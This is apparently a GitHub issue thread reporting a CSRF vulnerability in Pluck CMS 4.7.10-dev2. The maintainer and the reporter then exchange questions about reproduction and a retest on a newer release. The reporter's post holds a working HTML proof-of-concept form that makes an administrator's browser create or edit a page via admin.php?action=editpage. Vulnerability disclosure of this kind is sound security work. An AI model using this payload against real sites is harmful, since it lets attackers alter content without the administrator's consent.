search

pluck-cms / pluck

Central repo for pluck cms
http://www.pluck-cms.org
54 stars 37 forks source link

An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage #81

Closed F1sh1001 closed 4 years ago

F1sh1001 commented 4 years ago

CSRF POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/pluck/admin.php?action=editpage&page=111" method="POST">
      <input type="hidden" name="title" value="evil" />
      <input type="hidden" name="seo&#95;name" value="111" />
      <input type="hidden" name="content" value="evil" />
      <input type="hidden" name="description" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="hidden" value="no" />
      <input type="hidden" name="sub&#95;page" value="" />
      <input type="hidden" name="theme" value="oldstyle" />
      <input type="hidden" name="save" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

图片

BSteelooper commented 4 years ago

Where did you insert the script?? it is a javascript so it only resides in the client. The /h1 wil not appear in the file on disk..

Please explain more.

F1sh1001 commented 4 years ago

After the adminisstrator open the csrf exp page,then a new page called evil will be added to your website. 图片

BSteelooper commented 4 years ago

Could you please test the latest dev release 4.7.10-dev4? https://github.com/pluck-cms/pluck/releases/tag/4.7.10-dev4

BSteelooper commented 4 years ago

Have you retested with the latest dev version?

F1sh1001 commented 4 years ago

Sorry, I don't have much time. I'll try if I have time

------------------ 原始邮件 ------------------ 发件人: "Bas Steelooper"<notifications@github.com>; 发送时间: 2019年10月22日(星期二) 下午3:19 收件人: "pluck-cms/pluck"<pluck@noreply.github.com>; 抄送: "1113402387"<1113402387@qq.com>; "Author"<author@noreply.github.com>; 主题: Re: [pluck-cms/pluck] An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage (#81)

Have you retested with the latest dev version?

— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or unsubscribe.